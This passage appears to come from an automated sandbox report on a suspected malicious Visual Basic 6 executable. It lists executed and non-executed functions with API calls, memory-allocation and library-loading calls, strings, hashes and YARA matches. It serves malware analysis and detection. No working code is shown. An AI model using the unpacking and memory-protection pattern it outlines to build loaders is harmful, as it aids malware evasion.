Source File: 0000000F.00000002.138444333310.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.138444311128.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.138444555199.000000000042F000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.138444573282.0000000000431000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$CheckHresult$#557#568#706MoveNew2
String ID: 6/6/6
API String ID: 2852487234-3981586821
Opcode ID: fe552b38c71a01a0ad5f5299f35e47a8982bf7555799bb975f3d1df285c53d6d
Instruction ID: 712bf853cff5dfd8145d8f0bfec23aa8ccb555fdc4f873a6ce82290e0030f978
Opcode Fuzzy Hash: fe552b38c71a01a0ad5f5299f35e47a8982bf7555799bb975f3d1df285c53d6d
Instruction Fuzzy Hash: 78316F70900208ABCB10EFA5C946EDEBBB8EF54704F54412FF500B72E1DBB854458A59

Uniqueness

Uniqueness Score: -1.00%

Function 0042DDBB, Relevance: 10.6, APIs: 7, Instructions: 91COMMON

Download Yara Rule

APIs

__vbaObjSetAddref.MSVBVM60(?,?), ref: 0042DDF6
__vbaHresultCheckObj.MSVBVM60(00000000,?,00402228,00000058), ref: 0042DE14
__vbaObjSetAddref.MSVBVM60(?,?), ref: 0042DE1E
#644.MSVBVM60(?,?,?), ref: 0042DE27
__vbaFreeObj.MSVBVM60(00000000,?,?,?), ref: 0042DE37
__vbaHresultCheckObj.MSVBVM60(00000000,?,00402228,000002B0), ref: 0042DE97
__vbaFreeObj.MSVBVM60(0042DEB5), ref: 0042DEAF

Memory Dump Source

Source File: 0000000F.00000002.138444333310.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.138444311128.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.138444555199.000000000042F000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.138444573282.0000000000431000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$AddrefCheckFreeHresult$#644
String ID:
API String ID: 2435434276-0
Opcode ID: 53607bf75bc99b23afeb9da8c1bc90f2403e677190e0153709e265634757d4bb
Instruction ID: 90da51dd7aceaa3823aed1aeb58183574e6596ec788cb56faabdec89c21cb11b
Opcode Fuzzy Hash: 53607bf75bc99b23afeb9da8c1bc90f2403e677190e0153709e265634757d4bb
Instruction Fuzzy Hash: AF218FB1D00628ABCB01EFA9DD86E9F77BCEF08704F10051EF800BB191D778A90486A9

Uniqueness

Uniqueness Score: -1.00%

Function 02C1267D, Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 212COMMON

Download Yara Rule

APIs

EnumWindows.USER32 ref: 02C12687

Strings

E, xrefs: 02C127D4
Guc, xrefs: 02C12694

Memory Dump Source

Source File: 0000000F.00000002.138446041726.0000000002C10000.00000040.00000001.sdmp, Offset: 02C10000, based on PE: false

Yara matches

Similarity

API ID: EnumWindows
String ID: Guc$E
API String ID: 1129996299-111232842
Opcode ID: 7c81b8248fff04fbc6bbb701ae81b24491267ad8ce40758eb2a9ac279872b480
Instruction ID: c3c2904763dacf9b06ac3ed54a8aad931dff4b6ff180fd306c0e8fa47f2cfb82
Opcode Fuzzy Hash: 7c81b8248fff04fbc6bbb701ae81b24491267ad8ce40758eb2a9ac279872b480
Instruction Fuzzy Hash: 6771E936D095858FDB57EF3CD8CDDD6BBA5AE42624F1482CCD4834A44BE232451BC792

Uniqueness

Uniqueness Score: -1.00%

Function 0040137C, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 196COMMON

Download Yara Rule

APIs

#100.MSVBVM60(VB5!6&*), ref: 00401381

Strings

VB5!6&*, xrefs: 0040137C

Memory Dump Source

Source File: 0000000F.00000002.138444333310.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.138444311128.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.138444555199.000000000042F000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.138444573282.0000000000431000.00000002.00020000.sdmp Download File

Similarity

API ID: #100
String ID: VB5!6&*
API String ID: 1341478452-3593831657
Opcode ID: 4da97669c24223af7e20f1ee1008f27728f2318579157f224f4739836853dc8f
Instruction ID: 0a4777c414aa070b0a3d6bafd7df09a233e2f0d89c05d0a80e26a570885920e4
Opcode Fuzzy Hash: 4da97669c24223af7e20f1ee1008f27728f2318579157f224f4739836853dc8f
Instruction Fuzzy Hash: FE51566640E7C04FD7134B7489B91A5BFB0AE2771431A06EBC8C19F5B3D22C681BD726

Uniqueness

Uniqueness Score: -1.00%

Function 02C2C2D8, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 74libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(D7EA1F99), ref: 02C2D310

Strings

Gf8, xrefs: 02C2C7D9

Memory Dump Source

Source File: 0000000F.00000002.138446041726.0000000002C10000.00000040.00000001.sdmp, Offset: 02C10000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoad
String ID: Gf8
API String ID: 1029625771-2358942130
Opcode ID: a8153bd9524b4687a0b5393ca051d4a2c675bd0819dbb9147d8b46f57ed7e1bb
Instruction ID: f175c058495f584838889aca494b7e155a98a3a45987b60b09756a98e6f41f48
Opcode Fuzzy Hash: a8153bd9524b4687a0b5393ca051d4a2c675bd0819dbb9147d8b46f57ed7e1bb
Instruction Fuzzy Hash: D021A1705082A8CBDF34EE2ACD446FD3A66ABA4310F41462BDC0EAB114CF309749CB83

Uniqueness

Uniqueness Score: -1.00%

Function 02C15FE9, Relevance: 1.6, APIs: 1, Instructions: 111COMMON

Download Yara Rule

APIs

TerminateProcess.KERNELBASE(-8FEA7603), ref: 02C24692

Memory Dump Source

Source File: 0000000F.00000002.138446041726.0000000002C10000.00000040.00000001.sdmp, Offset: 02C10000, based on PE: false

Yara matches

Similarity

API ID: ProcessTerminate
String ID:
API String ID: 560597551-0
Opcode ID: 62401bcc433a7fa942ee22debefb0fcb6746090667c9c76a8c06f7fa2a86af85
Instruction ID: feac83fbb514c9f0dbdaa16ee1f35acd82304997112c78c24a22e77b965fd1e3
Opcode Fuzzy Hash: 62401bcc433a7fa942ee22debefb0fcb6746090667c9c76a8c06f7fa2a86af85
Instruction Fuzzy Hash: CF4126324083C59BC7228B3898063DABFB5AF03318F5A45DEC8948BA93D336565FD752

Uniqueness

Uniqueness Score: -1.00%

Function 02C2503B, Relevance: 1.6, APIs: 1, Instructions: 53libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL(02C14924), ref: 02C281A2

Memory Dump Source

Source File: 0000000F.00000002.138446041726.0000000002C10000.00000040.00000001.sdmp, Offset: 02C10000, based on PE: false

Yara matches

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: ab1d38cc2c255560439a55d2db53db10c69c2b8550f920f955e7d1f06f5794cc
Instruction ID: e4c1a80d677a73ff4f8ca9ec8f25c45a0138f55e7a44c5d934aa450f23b736a0
Opcode Fuzzy Hash: ab1d38cc2c255560439a55d2db53db10c69c2b8550f920f955e7d1f06f5794cc
Instruction Fuzzy Hash: 41114836E04455DFCB12FF7CD8C8DD6BBA6AF42B14B104348D4825B04AD732841BCBA1

Uniqueness

Uniqueness Score: -1.00%

Function 02C2742D, Relevance: 1.5, APIs: 1, Instructions: 12libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL(02C14924), ref: 02C281A2

Memory Dump Source

Source File: 0000000F.00000002.138446041726.0000000002C10000.00000040.00000001.sdmp, Offset: 02C10000, based on PE: false

Yara matches

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: bbe7f893722e271d2332a33a82b2110829c996a555101d441d4084932ec0d8ab
Instruction ID: dd894c42910a718e6afcaac694e0e18f1cd2148d6350929341565ba453668258
Opcode Fuzzy Hash: bbe7f893722e271d2332a33a82b2110829c996a555101d441d4084932ec0d8ab
Instruction Fuzzy Hash: 5FC08C3894257850E58072E586C0AA921118F903C1F98C121DE161BE4ECF34C40EBFB1

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0042A934, Relevance: 56.2, APIs: 31, Strings: 1, Instructions: 234COMMON

Download Yara Rule

APIs

#526.MSVBVM60(?,00000001), ref: 0042A994
__vbaVarTstNe.MSVBVM60(?,?,?,00000001), ref: 0042A9AF
__vbaFreeVar.MSVBVM60(?,?,?,00000001), ref: 0042A9BA
__vbaNew2.MSVBVM60(0040238C,0042F5B4,?,?,?,00000001), ref: 0042A9DA
__vbaHresultCheckObj.MSVBVM60(00000000,021FEDB4,0040237C,00000014), ref: 0042A9FE
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040239C,000000B8), ref: 0042AA27
__vbaFreeObj.MSVBVM60(00000000,?,0040239C,000000B8), ref: 0042AA2F
#539.MSVBVM60(?,00000001,00000001,00000001), ref: 0042AA3B
__vbaStrVarMove.MSVBVM60(?,?,00000001,00000001,00000001), ref: 0042AA44
__vbaStrMove.MSVBVM60(?,?,00000001,00000001,00000001), ref: 0042AA4E
__vbaFreeVar.MSVBVM60(?,?,00000001,00000001,00000001), ref: 0042AA56
__vbaNew2.MSVBVM60(00401BAC,0042F010,?,?,00000001,00000001,00000001), ref: 0042AA6E
__vbaObjSet.MSVBVM60(?,00000000), ref: 0042AA86
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,004023AC,00000110), ref: 0042AAAC
#532.MSVBVM60(?), ref: 0042AAB4
__vbaFreeStr.MSVBVM60(?), ref: 0042AABC
__vbaFreeObj.MSVBVM60(?), ref: 0042AAC4
__vbaBoolStr.MSVBVM60(True,?,?,?,00000001), ref: 0042AACE
__vbaNew2.MSVBVM60(0040238C,0042F5B4,True,?,?,?,00000001), ref: 0042AAEF
__vbaHresultCheckObj.MSVBVM60(00000000,021FEDB4,0040237C,00000014), ref: 0042AB13
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040239C,000000E8), ref: 0042AB3C
__vbaStrMove.MSVBVM60(00000000,?,0040239C,000000E8), ref: 0042AB4A
__vbaFreeObj.MSVBVM60(00000000,?,0040239C,000000E8), ref: 0042AB52
__vbaNew2.MSVBVM60(0040238C,0042F5B4), ref: 0042AB69
__vbaHresultCheckObj.MSVBVM60(00000000,021FEDB4,0040237C,0000004C), ref: 0042AB8D
__vbaHresultCheckObj.MSVBVM60(00000000,?,004023CC,00000028), ref: 0042ABAC
__vbaFreeObj.MSVBVM60(00000000,?,004023CC,00000028), ref: 0042ABB4
__vbaFpI4.MSVBVM60(00000000,?,004023CC,00000028), ref: 0042ABC4
__vbaHresultCheckObj.MSVBVM60(00000000,000000FE,00402228,00000064), ref: 0042ABDD
__vbaFreeStr.MSVBVM60(0042AC21,True,?,?,?,00000001), ref: 0042AC13

Strings

True, xrefs: 0042AAC9

Memory Dump Source

Source File: 0000000F.00000002.138444333310.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.138444311128.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.138444555199.000000000042F000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.138444573282.0000000000431000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$CheckFreeHresult$New2$Move$#526#532#539Bool
String ID: True
API String ID: 2916232083-1573839795
Opcode ID: d21ac2f9756c34b8a74d765d9b1e185aaeb5d1cd4a6e170515e59d43617b618e
Instruction ID: eee5ac21ca96bd58c219fff64775f251e41dda24355e8548afabaa71934d1f9b
Opcode Fuzzy Hash: d21ac2f9756c34b8a74d765d9b1e185aaeb5d1cd4a6e170515e59d43617b618e
Instruction Fuzzy Hash: 62819271A40214ABDB10EFA1D98AEDE7BB8EF58314F94043BF900B71E1D7786945CB68

Uniqueness

Uniqueness Score: -1.00%

Function 0042B38A, Relevance: 42.1, APIs: 18, Strings: 6, Instructions: 135COMMON

Download Yara Rule

APIs

#512.MSVBVM60(00402418,00000002), ref: 0042B3CA
__vbaStrMove.MSVBVM60(00402418,00000002), ref: 0042B3D4
__vbaStrCmp.MSVBVM60(00402424,00000000,00402418,00000002), ref: 0042B3DF
__vbaFreeStr.MSVBVM60(00402424,00000000,00402418,00000002), ref: 0042B3F1
#690.MSVBVM60(forureningsforebyggendes,Sikkerhedkopiering6,Jaimie6,EVADNE,00402424,00000000,00402418,00000002), ref: 0042B413
#541.MSVBVM60(?,17:17:17,forureningsforebyggendes,Sikkerhedkopiering6,Jaimie6,EVADNE,00402424,00000000,00402418,00000002), ref: 0042B421
__vbaStrVarMove.MSVBVM60(?,?,17:17:17,forureningsforebyggendes,Sikkerhedkopiering6,Jaimie6,EVADNE,00402424,00000000,00402418,00000002), ref: 0042B42A
__vbaStrMove.MSVBVM60(?,?,17:17:17,forureningsforebyggendes,Sikkerhedkopiering6,Jaimie6,EVADNE,00402424,00000000,00402418,00000002), ref: 0042B434
__vbaFreeVar.MSVBVM60(?,?,17:17:17,forureningsforebyggendes,Sikkerhedkopiering6,Jaimie6,EVADNE,00402424,00000000,00402418,00000002), ref: 0042B43C
__vbaNew2.MSVBVM60(0040238C,0042F5B4,?,?,17:17:17,forureningsforebyggendes,Sikkerhedkopiering6,Jaimie6,EVADNE,00402424,00000000,00402418,00000002), ref: 0042B453
__vbaHresultCheckObj.MSVBVM60(00000000,021FEDB4,0040237C,0000001C), ref: 0042B477
__vbaHresultCheckObj.MSVBVM60(00000000,?,004024E0,00000064), ref: 0042B49C
__vbaFreeObj.MSVBVM60(00000000,?,004024E0,00000064), ref: 0042B4A4
__vbaNew2.MSVBVM60(00401BAC,0042F010,00402424,00000000,00402418,00000002), ref: 0042B4BC
__vbaObjSet.MSVBVM60(?,00000000), ref: 0042B4D4
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,004023AC,000001B0), ref: 0042B510
__vbaFreeObj.MSVBVM60(00000000,00000000,004023AC,000001B0), ref: 0042B518
__vbaFreeStr.MSVBVM60(0042B54D), ref: 0042B547

Strings

Jaimie6, xrefs: 0042B404
X4, xrefs: 0042B51D
EVADNE, xrefs: 0042B3FF
forureningsforebyggendes, xrefs: 0042B40E
Sikkerhedkopiering6, xrefs: 0042B409
17:17:17, xrefs: 0042B418

Memory Dump Source

Source File: 0000000F.00000002.138444333310.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.138444311128.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.138444555199.000000000042F000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.138444573282.0000000000431000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$CheckHresultMove$New2$#512#541#690
String ID: 17:17:17$EVADNE$Jaimie6$Sikkerhedkopiering6$X4$forureningsforebyggendes
API String ID: 509014564-2754207988
Opcode ID: 47e6c6a805af6dbf2c908de4f67353a3b2e1b48b0ce6aee00380844cad00a5c8
Instruction ID: 7c8b6068a66c8e573243ee70223de2b6d94009e2cb81fa34890380416baed3ae
Opcode Fuzzy Hash: 47e6c6a805af6dbf2c908de4f67353a3b2e1b48b0ce6aee00380844cad00a5c8
Instruction Fuzzy Hash: 8B418371A40214ABDB10FFA5DD8AE9E77B8EF54704FA0403BF501B71E2D7BC690586A8

Uniqueness

Uniqueness Score: -1.00%

Function 0042B6C1, Relevance: 28.7, APIs: 19, Instructions: 151COMMON

Download Yara Rule

APIs

__vbaVarDup.MSVBVM60 ref: 0042B71F
#563.MSVBVM60(?), ref: 0042B728
__vbaFreeVar.MSVBVM60(?), ref: 0042B73C
#611.MSVBVM60(?), ref: 0042B74A
__vbaStrMove.MSVBVM60(?), ref: 0042B754
#539.MSVBVM60(?,00000001,00000001,00000001,?), ref: 0042B763
__vbaStrVarMove.MSVBVM60(?,?,00000001,00000001,00000001,?), ref: 0042B76C
__vbaStrMove.MSVBVM60(?,?,00000001,00000001,00000001,?), ref: 0042B776
__vbaFreeVar.MSVBVM60(?,?,00000001,00000001,00000001,?), ref: 0042B77E
#685.MSVBVM60(?,?,00000001,00000001,00000001,?), ref: 0042B783
__vbaObjSet.MSVBVM60(?,00000000,?,?,00000001,00000001,00000001,?), ref: 0042B78D
__vbaNew2.MSVBVM60(00401BAC,0042F010,?,00000000,?,?,00000001,00000001,00000001,?), ref: 0042B7C7
__vbaObjSet.MSVBVM60(?,00000000), ref: 0042B7DF
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00402508,000001E8), ref: 0042B808
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00402518,00000044), ref: 0042B83A
__vbaFreeObjList.MSVBVM60(00000002,?,?), ref: 0042B849
__vbaFreeVarList.MSVBVM60(00000004,?,?,?,?,00000002,?,?), ref: 0042B860
__vbaFreeStr.MSVBVM60(0042B8AA,?), ref: 0042B89C
__vbaFreeStr.MSVBVM60(0042B8AA,?), ref: 0042B8A4

Memory Dump Source

Source File: 0000000F.00000002.138444333310.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.138444311128.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.138444555199.000000000042F000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.138444573282.0000000000431000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$Move$CheckHresultList$#539#563#611#685New2
String ID:
API String ID: 401280197-0
Opcode ID: ec5fa6d15dd9cd53944810b568695504963184bd6d959c4d517d60b65d027325
Instruction ID: baf0d10eb9a5b419a223cc6c95f14da7fa83309385c4ed17ffde0e0f59fd9816
Opcode Fuzzy Hash: ec5fa6d15dd9cd53944810b568695504963184bd6d959c4d517d60b65d027325
Instruction Fuzzy Hash: BD5119B1A10228ABDB14EBD4DC86EEEB7B8BF08704F54012FF505F7191DB7859058B98

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: Dlls.exe PID: 6216 Parent PID: 4680 Dlls.exeCOMMON

Executed Functions

Function 04F71BCE, Relevance: 5.8, APIs: 1, Strings: 2, Instructions: 566COMMON

Download Yara Rule

Strings

Z5, xrefs: 04F73D6F
Gf8, xrefs: 04F6C7D9

Memory Dump Source

Source File: 00000011.00000002.138640980805.0000000004F50000.00000040.00000001.sdmp, Offset: 04F50000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoadMemoryProtectVirtual
String ID: Gf8$Z5
API String ID: 3389902171-947967345
Opcode ID: 2296fab55f1c8ed6d1c170149b31a38f618417abe284a01bd0c8561280f84c22
Instruction ID: 101fe99fce6074a31007c91531ea2de6db01fe4265e6619f5a7d93c573fd868b
Opcode Fuzzy Hash: 2296fab55f1c8ed6d1c170149b31a38f618417abe284a01bd0c8561280f84c22
Instruction Fuzzy Hash: F332D7316083C59FDB75CF38CC987DA7BA1AF56310F4982AACC9A8F296D3349546C712

Uniqueness

Uniqueness Score: -1.00%

Function 04F67574, Relevance: 4.3, APIs: 1, Strings: 1, Instructions: 800COMMON

Download Yara Rule

Strings

QJQ, xrefs: 04F61C83

Memory Dump Source

Source File: 00000011.00000002.138640980805.0000000004F50000.00000040.00000001.sdmp, Offset: 04F50000, based on PE: false

Yara matches

Similarity

API ID: AllocateLibraryLoadMemoryVirtual
String ID: QJQ
API String ID: 2616484454-1123671965
Opcode ID: 23a87022dab17b6a7da1b40d579749e676e298f6ed3110e98488bc9b326012ff
Instruction ID: e51421362a2755684da89b476010f479b188280b2c497dad855f17dbaef89ce4
Opcode Fuzzy Hash: 23a87022dab17b6a7da1b40d579749e676e298f6ed3110e98488bc9b326012ff
Instruction Fuzzy Hash: 8772F4B2604389DFDB749F68CD517EA7BA2FF55340F51811EDC8A9B214D730AA42CB82

Uniqueness

Uniqueness Score: -1.00%

Function 04F7130A, Relevance: 4.3, APIs: 1, Strings: 1, Instructions: 790COMMON

Download Yara Rule

Strings

QJQ, xrefs: 04F61C83

Memory Dump Source

Source File: 00000011.00000002.138640980805.0000000004F50000.00000040.00000001.sdmp, Offset: 04F50000, based on PE: false

Yara matches

Similarity

API ID:
String ID: QJQ
API String ID: 0-1123671965
Opcode ID: 3c8faa50bc7a6fbf58bdea1535cfeafc80df8a2332d9c73fd0d59aeacaf475f7
Instruction ID: f1274424b60bc9319175cd327a2c8ae6cf6147442d87b76b18320d733224427a
Opcode Fuzzy Hash: 3c8faa50bc7a6fbf58bdea1535cfeafc80df8a2332d9c73fd0d59aeacaf475f7
Instruction Fuzzy Hash: 267212B2A04389DFDB749F28CD417EA7BA2FF55350F56811ADC8A9B210D7346A42CB42

Uniqueness

Uniqueness Score: -1.00%

Function 04F6087E, Relevance: 4.2, APIs: 1, Strings: 1, Instructions: 739COMMON

Download Yara Rule

Strings

QJQ, xrefs: 04F61C83

Memory Dump Source

Source File: 00000011.00000002.138640980805.0000000004F50000.00000040.00000001.sdmp, Offset: 04F50000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoad
String ID: QJQ
API String ID: 1029625771-1123671965
Opcode ID: b8476430e8e40aaf17f4d9c2bf36d9921c7c3f1080ee0bda1ffff81e29240989
Instruction ID: 4de73e1991b1d96cc45b35aabcff975ce1deb2f5722336ac7c27610115cb05f7
Opcode Fuzzy Hash: b8476430e8e40aaf17f4d9c2bf36d9921c7c3f1080ee0bda1ffff81e29240989
Instruction Fuzzy Hash: 72620272604389DFDB749F38CD517EA7BA2FF55350F56811ADC8A9B210D7306A82CB82

Uniqueness

Uniqueness Score: -1.00%

Function 04F6557A, Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 260memorynativeCOMMON

Download Yara Rule

APIs

Part of subcall function 04F6C2D8: LoadLibraryA.KERNELBASE(D7EA1F99), ref: 04F6D310

NtAllocateVirtualMemory.NTDLL ref: 04F65BAE

Strings

_, xrefs: 04F66024

Memory Dump Source

Source File: 00000011.00000002.138640980805.0000000004F50000.00000040.00000001.sdmp, Offset: 04F50000, based on PE: false

Yara matches

Similarity

API ID: AllocateLibraryLoadMemoryVirtual
String ID: _
API String ID: 2616484454-701932520
Opcode ID: 0a951bf2a667fc2ffffe84a5f486d5a5026bcc7952e377380f4c3f2a527b1682
Instruction ID: 9505302accfd0e5d002bf83030b89816dcebcd7e8ac0b06b279cbdf3c1321c52
Opcode Fuzzy Hash: 0a951bf2a667fc2ffffe84a5f486d5a5026bcc7952e377380f4c3f2a527b1682
Instruction Fuzzy Hash: 4FA1E931E086869FDB16EF3CDCCCEE6B7A6AF41724F45428CA8835B04AE3715516C792

Uniqueness

Uniqueness Score: -1.00%

Function 04F7474A, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 186COMMON

Download Yara Rule

Strings

1bU, xrefs: 04F74B4E

Memory Dump Source

Source File: 00000011.00000002.138640980805.0000000004F50000.00000040.00000001.sdmp, Offset: 04F50000, based on PE: false

Yara matches

Similarity

API ID:
String ID: 1bU
API String ID: 0-1111237263
Opcode ID: 5d26eeb61cba4eb7f5cae6757a1faeb0780fc9a9d562307f876b6119f16c2d66
Instruction ID: a6b80965c2825f1d5d4e5a874b2aa31f65de9167bee16712d650a47108cd7118
Opcode Fuzzy Hash: 5d26eeb61cba4eb7f5cae6757a1faeb0780fc9a9d562307f876b6119f16c2d66
Instruction Fuzzy Hash: 67710372A04648DFDF35CE24CD987EA37B1AF85310F15422BCC4A9F654E339AA46CB42

Uniqueness

Uniqueness Score: -1.00%

Function 04F6ECDD, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 102libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(D7EA1F99), ref: 04F6D310

Strings

Gf8, xrefs: 04F6C7D9

Memory Dump Source

Source File: 00000011.00000002.138640980805.0000000004F50000.00000040.00000001.sdmp, Offset: 04F50000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoad
String ID: Gf8
API String ID: 1029625771-2358942130
Opcode ID: 698ac7fa9a16c30732d87508c17710465fd7dff275ac96f8448f73bbaed36040
Instruction ID: a6437d484f2d9633c22693307ae29c12948a520302d7cfce6a9e332ba17c03a6
Opcode Fuzzy Hash: 698ac7fa9a16c30732d87508c17710465fd7dff275ac96f8448f73bbaed36040
Instruction Fuzzy Hash: E8310A76B082889BEF30DE358D442EA3A62AF95250F55912A9C8F57244E3317A439752

Uniqueness

Uniqueness Score: -1.00%

Function 04F74084, Relevance: 1.6, APIs: 1, Instructions: 54nativeCOMMON

Download Yara Rule

APIs

NtProtectVirtualMemory.NTDLL ref: 04F74233

Memory Dump Source

Source File: 00000011.00000002.138640980805.0000000004F50000.00000040.00000001.sdmp, Offset: 04F50000, based on PE: false

Yara matches

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: 6915733f7f1efe11a760b8a05010e9941f3b490219f892f823f8ea32893b3593
Instruction ID: 397402b109eff048d7d4a25bdde57a5b142d08e0a4de11da1518ce8e12941bf8
Opcode Fuzzy Hash: 6915733f7f1efe11a760b8a05010e9941f3b490219f892f823f8ea32893b3593
Instruction Fuzzy Hash: 921155725043949FDB34CF28CC946E6BBA4FF89320F45819EDD866B205D3706A02CB14

Uniqueness

Uniqueness Score: -1.00%

Function 04F64B8B, Relevance: 1.5, APIs: 1, Instructions: 48fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNELBASE(?), ref: 04F64EB1

Memory Dump Source

Source File: 00000011.00000002.138640980805.0000000004F50000.00000040.00000001.sdmp, Offset: 04F50000, based on PE: false

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 7e01c117410fc39e1368157bc4c9cf9280b8ca0a60405592e7f2b7927a61b07b
Instruction ID: e1d063e7fc810db97a7d37ccc04f9a2a7e84301ce60910c834cc70e4937e65de
Opcode Fuzzy Hash: 7e01c117410fc39e1368157bc4c9cf9280b8ca0a60405592e7f2b7927a61b07b
Instruction Fuzzy Hash: 1D113132988300DFC7986EA4C9056EABBA2FF69390F02480DDCC653510E3341A92CB0B

Uniqueness

Uniqueness Score: -1.00%

Function 04F5267D, Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 212COMMON

Download Yara Rule

APIs

EnumWindows.USER32 ref: 04F52687

Strings

Guc, xrefs: 04F52694
E, xrefs: 04F527D4

Memory Dump Source

Source File: 00000011.00000002.138640980805.0000000004F50000.00000040.00000001.sdmp, Offset: 04F50000, based on PE: false

Yara matches

Similarity

API ID: EnumWindows
String ID: Guc$E
API String ID: 1129996299-111232842
Opcode ID: 7c81b8248fff04fbc6bbb701ae81b24491267ad8ce40758eb2a9ac279872b480
Instruction ID: 5b37204f183f7b6bb199687d661313cc2744777f78c016e2a7f39bfdaa67f186
Opcode Fuzzy Hash: 7c81b8248fff04fbc6bbb701ae81b24491267ad8ce40758eb2a9ac279872b480
Instruction Fuzzy Hash: 4D71F932E095858FDB13EF7CE8CDDD67BA5AE42624F1583CCD4834A40BE232551BC652

Uniqueness

Uniqueness Score: -1.00%

Function 04F6C2D8, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 74libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(D7EA1F99), ref: 04F6D310

Strings

Gf8, xrefs: 04F6C7D9

Memory Dump Source

Source File: 00000011.00000002.138640980805.0000000004F50000.00000040.00000001.sdmp, Offset: 04F50000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoad
String ID: Gf8
API String ID: 1029625771-2358942130
Opcode ID: a8153bd9524b4687a0b5393ca051d4a2c675bd0819dbb9147d8b46f57ed7e1bb
Instruction ID: d0933f458b676ad3e52b19695b0ecf0af672816f59db453c6bae3415acd38449
Opcode Fuzzy Hash: a8153bd9524b4687a0b5393ca051d4a2c675bd0819dbb9147d8b46f57ed7e1bb
Instruction Fuzzy Hash: 1E21B27670C288DBDF349E288D546FE3A65AF95210F40522B9C8F9B205E7307A439B53

Uniqueness

Uniqueness Score: -1.00%

Function 04F55FE9, Relevance: 1.6, APIs: 1, Instructions: 111COMMON

Download Yara Rule

APIs

TerminateProcess.KERNELBASE(-8FEA7603), ref: 04F64692

Memory Dump Source

Source File: 00000011.00000002.138640980805.0000000004F50000.00000040.00000001.sdmp, Offset: 04F50000, based on PE: false

Yara matches

Similarity

API ID: ProcessTerminate
String ID:
API String ID: 560597551-0
Opcode ID: 62401bcc433a7fa942ee22debefb0fcb6746090667c9c76a8c06f7fa2a86af85
Instruction ID: af8b54b5356c78b7288e2f90a63dc5d063d8c2c3b79e070060a57bebc5bb5eac
Opcode Fuzzy Hash: 62401bcc433a7fa942ee22debefb0fcb6746090667c9c76a8c06f7fa2a86af85
Instruction Fuzzy Hash: 404136324083C59BD7229B3898053DABFB1AF03308F9945DEC9988BA53D336655FC752

Uniqueness

Uniqueness Score: -1.00%

Function 04F6503B, Relevance: 1.6, APIs: 1, Instructions: 53libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL(04F54924), ref: 04F681A2

Memory Dump Source

Source File: 00000011.00000002.138640980805.0000000004F50000.00000040.00000001.sdmp, Offset: 04F50000, based on PE: false

Yara matches

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: ab1d38cc2c255560439a55d2db53db10c69c2b8550f920f955e7d1f06f5794cc
Instruction ID: 92f002d031293e051f8744d156fc8012e9b666e6a71b8f02ffc32bc28e2de190
Opcode Fuzzy Hash: ab1d38cc2c255560439a55d2db53db10c69c2b8550f920f955e7d1f06f5794cc
Instruction Fuzzy Hash: EA11E536E05445DFDB12FF6CD8C8DD6BBA6AF42B14B10524CD4835B50AD332941BCB91

Uniqueness

Uniqueness Score: -1.00%

Function 04F6742D, Relevance: 1.5, APIs: 1, Instructions: 12libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL(04F54924), ref: 04F681A2

Memory Dump Source

